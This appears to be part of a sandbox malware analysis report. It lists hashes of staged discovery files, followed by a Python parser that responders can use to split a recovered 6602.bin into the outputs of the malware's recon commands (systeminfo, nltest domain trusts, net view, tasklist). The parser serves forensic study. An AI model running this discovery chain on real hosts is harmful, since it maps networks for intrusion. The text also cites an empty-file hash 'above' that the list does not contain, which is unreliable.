| SHA1 | ea8db863a41c24696622269c1e9a59470d81d5ae |
| SHA256 | f4afef97443809ed08b7b279fb70ddef9e3e2ae96dbf0f0f8878d342c53ee765 |
| SHA512 | 6d18d72d27153253d36c2943d01ec09fded565afb6d6094c4a7062132ad60c4ad58ccbfc035644784ed338d543325f2e3062138cafebd4e4b6281f346a03d183 |
memory/4388-192-0x0000000000000000-mapping.dmp
memory/4448-193-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 550324b3d2c3fccbf11991e605fb633a |
| SHA1 | 0e72da4bfa6e52f9b5627a825038f85135dc341a |
| SHA256 | bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1 |
| SHA512 | 49883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20 |
memory/2232-195-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 550324b3d2c3fccbf11991e605fb633a |
| SHA1 | 0e72da4bfa6e52f9b5627a825038f85135dc341a |
| SHA256 | bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1 |
| SHA512 | 49883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20 |
memory/3144-197-0x0000000000000000-mapping.dmp
memory/2728-198-0x0000000000000000-mapping.dmp
memory/3576-199-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 94b550334ec2b1b98472ead5fce8f180 |
| SHA1 | d2f658d2e49fcdc6c43b91e1dc712922f6412945 |
| SHA256 | 95a7fe2794be40bd2ac401f1b64b163db7c497887cc7833c59191e69cb8a4ca1 |
| SHA512 | 004cfcdf654e8160192b9181586c0ed1493c8638b77cf718f3e5419054b95db288412d98abdbfde6720e283548ad1ab3a172ad3ea33cb9f796c212e928c1d979 |
memory/3936-201-0x0000000000000000-mapping.dmp
memory/4472-202-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | de21ae01f00b8ae78b2d39e2055d1dc0 |
| SHA1 | 397a864a9dc4f574820996dc4d32a37659d0b531 |
| SHA256 | d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937 |
| SHA512 | d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816 |
memory/3484-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | de21ae01f00b8ae78b2d39e2055d1dc0 |
| SHA1 | 397a864a9dc4f574820996dc4d32a37659d0b531 |
| SHA256 | d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937 |
| SHA512 | d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816 |
memory/4616-206-0x0000000000000000-mapping.dmp
memory/2256-207-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 397eb325e338a7924c540b5bcd94e374 |
| SHA1 | f88da33ae78e5fd848531e462da24a9a7c57de88 |
| SHA256 | 6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c |
| SHA512 | f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e |
memory/3516-209-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 397eb325e338a7924c540b5bcd94e374 |
| SHA1 | f88da33ae78e5fd848531e462da24a9a7c57de88 |
| SHA256 | 6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c |
| SHA512 | f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e |
memory/1152-211-0x0000000000000000-mapping.dmp
memory/4456-212-0x0000000000000000-mapping.dmp
memory/2400-213-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | f1a2aa1f4f0c2e950ca2e946f24e52a7 |
| SHA1 | 5a6aa89b4cd8a10c7e968b3d357e8b438c7533d0 |
| SHA256 | 1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed |
| SHA512 | 54a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f |
memory/1976-215-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | f1a2aa1f4f0c2e950ca2e946f24e52a7 |
| SHA1 | 5a6aa89b4cd8a10c7e968b3d357e8b438c7533d0 |
| SHA256 | 1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed |
| SHA512 | 54a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f |
memory/2588-217-0x0000000000000000-mapping.dmp
memory/4276-218-0x0000000000000000-mapping.dmp
memory/4912-219-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 9bae8ae2e7f60de0d8c3f9809a365b5a |
| SHA1 | c05309024e67723dbc40583390d9deb970208a30 |
| SHA256 | 9ef11a026250169cb0eca6369809bee07b0f24c5c1933938c25f4f84eb5d0abb |
| SHA512 | 0a55a13b234f55851cfe4b49d8cbf24c50db3805aeb00a3ca8004824c045fb0a3619e8a038b849f953672e2092a3e43bc945e7902458fb0b580f41cdaeddfc0a |
memory/5012-221-0x0000000000000000-mapping.dmp
memory/844-222-0x0000000000000000-mapping.dmp
memory/920-223-0x0000000000000000-mapping.dmp
memory/4036-225-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | 24e087934651d6f0a5885fa46f185864 |
| SHA1 | b20946bd3d31fcd75bc758c8e659de9dafaf20eb |
| SHA256 | b1626a5b8040ba8fbc5f15bdbde39f8e25177873df1fd2865db6949bc263af02 |
| SHA512 | f98260eb89115d6f26e03a6d866bd6bebcfb6a02dd69814f9a15e617670527556f8e7fdbc9f72ab323585169b28783a95982b929722294812ef0e4fa91ded06e |
memory/1092-226-0x0000000000000000-mapping.dmp
memory/2528-227-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | eb94ae3ce4b86bff9cafe1503fbc001d |
| SHA1 | 0bc3aee0a38c82f1e6775b1428219e7460e38ace |
| SHA256 | b037abcec90bc47921db5c251215e9cb135511d0b08ce395fd697b88d1e99f6b |
| SHA512 | 922243683bad6ef9ccb80fff75c8ff44673acd5c8f52e693c66e3e35589a12bd5ee24d875dea2759d6912a2159aa1d7086e765dd488bfef11eb531c9fe863aa2 |
memory/4892-229-0x0000000000000000-mapping.dmp
memory/5088-230-0x0000000000000000-mapping.dmp
memory/1980-231-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\6602.bin1
| MD5 | a345edcdee52303ac713c76b2366a94c |
| SHA1 | 4452c95702106a78f24f701612788561e04c6407 |
| SHA256 | 4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d |
| SHA512 | 3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a |
C:\Users\Admin\AppData\Local\Temp\6602.bin
| MD5 | a345edcdee52303ac713c76b2366a94c |
| SHA1 | 4452c95702106a78f24f701612788561e04c6407 |
| SHA256 | 4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d |
| SHA512 | 3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a |
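Added forensic example (Python written for this page, not part of the report): a parser for a recovered 6602.bin or a mid-chain 6602.bin1 snapshot such as the ones hashed above. It uses the command order from the process tree and two details a responder should not trip over: `systeminfo.exe > 6602.bin1` uses a single `>`, so it truncates the file and discards the earlier `wmic computersystem get domain` output (the empty-file snapshot with MD5 d41d8cd98f00b204e9800998ecf8427e above is that truncation), and the final `cmd /U /C type` copy is written as UTF-16LE because that is what `/U` does to internal-command output. The sample file contents are constructed, and cp437 as the console code page is an assumption.

```python
import re

# Order in which the cmd.exe chain appends to 6602.bin1 once `systeminfo.exe >`
# has truncated it. Each later command uses >> and is followed by an echo of the
# separator, so the finished file is eleven outputs each closed by "--------".
SECTION_ORDER = [
    "systeminfo", "net view", "nslookup 127.0.0.1", "tasklist /SVC", "driverquery",
    "reg query Uninstall", "net config workstation", "nltest /domain_trusts",
    "nltest /domain_trusts /all_trusts", "net view /all /domain", "net view /all",
]
SEPARATOR = re.compile(r"^-{8}\r?$", re.M)


def decode_staged(data: bytes) -> str:
    """6602.bin1 is written by external tools in the console (OEM) code page; the
    final 6602.bin is produced by `cmd /U /C type`, and /U makes cmd's internal
    commands emit UTF-16LE. cp437 is assumed for the OEM code page (en-US box)."""
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le", errors="replace")
    if len(data) >= 8 and data[1:8:2] == b"\x00\x00\x00\x00":   # ASCII text as wide chars
        return data.decode("utf-16-le", errors="replace")
    return data.decode("cp437", errors="replace")


def parse_staged(data: bytes) -> dict:
    """Split the file at the separator lines and label each piece with the command
    that produced it. A snapshot taken mid-chain simply yields fewer sections."""
    parts = SEPARATOR.split(decode_staged(data))
    if parts and not parts[-1].strip():
        parts.pop()                          # text after the final separator is empty
    if len(parts) > len(SECTION_ORDER):
        raise ValueError(f"{len(parts)} sections, expected at most {len(SECTION_ORDER)}")
    return {name: part.strip("\r\n") for name, part in zip(SECTION_ORDER, parts)}


SYSINFO_FIELD = re.compile(r"^(Host Name|OS Name|Domain|Logon Server):\s*(.*?)\s*$", re.M | re.I)
TASKLIST_ROW = re.compile(r"^\S+\.exe\s+\d+\s+(.+?)\s*$", re.M | re.I)


def host_summary(sections: dict) -> dict:
    """What a responder wants first: which host this is, whether it is domain-joined
    (the nltest and net view sections only carry data if it is), and which services
    were hosted in running processes."""
    info = {k.lower(): v for k, v in SYSINFO_FIELD.findall(sections.get("systeminfo", ""))}
    services = set()
    for row in TASKLIST_ROW.findall(sections.get("tasklist /SVC", "")):
        services.update(s for s in row.split(", ") if s != "N/A")
    domain = info.get("domain", "")
    return {"host": info.get("host name"), "os": info.get("os name"), "domain": domain,
            "domain_joined": domain.upper() not in ("", "WORKGROUP"),
            "services": sorted(services)}


# Constructed stand-in for a recovered 6602.bin (not the real capture): eleven
# outputs in SECTION_ORDER, each closed by the separator, encoded as cmd /U writes
# them. Empty strings model commands that wrote only to stderr.
_OUTPUTS = [
    "\r\nHost Name:                 DESKTOP-ABC123\r\nOS Name:                   Microsoft Windows 10 Pro\r\n"
    "Domain:                    WORKGROUP\r\nLogon Server:              \\\\DESKTOP-ABC123\r\n",
    "",
    "Server:  UnKnown\r\nAddress:  8.8.8.8\r\n\r\nName:    localhost\r\nAddress:  127.0.0.1\r\n",
    "\r\nImage Name                     PID Services\r\n========================= ======== ============\r\n"
    "System Idle Process              0 N/A\r\nsvchost.exe                    812 RpcEptMapper, RpcSs\r\n"
    "Explorer.EXE                  3020 N/A\r\n",
    "Module Name  Display Name           Driver Type   Link Date\r\nACPI         Microsoft ACPI Driver  Kernel\r\n",
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Example\r\n"
    "    DisplayName    REG_SZ    Example App\r\n",
    "Computer name                        \\\\DESKTOP-ABC123\r\nWorkstation domain                   WORKGROUP\r\n",
    "", "", "", "",
]
SAMPLE_BIN = "".join(out + "--------\r\n" for out in _OUTPUTS).encode("utf-16-le")

if __name__ == "__main__":
    sections = parse_staged(SAMPLE_BIN)
    print(host_summary(sections))
```

If the recovered file has fewer than eleven sections, the snapshot predates the end of the chain; the partial dict still lines up with the commands that had run by then, which is enough to tell which discovery results the operator already had.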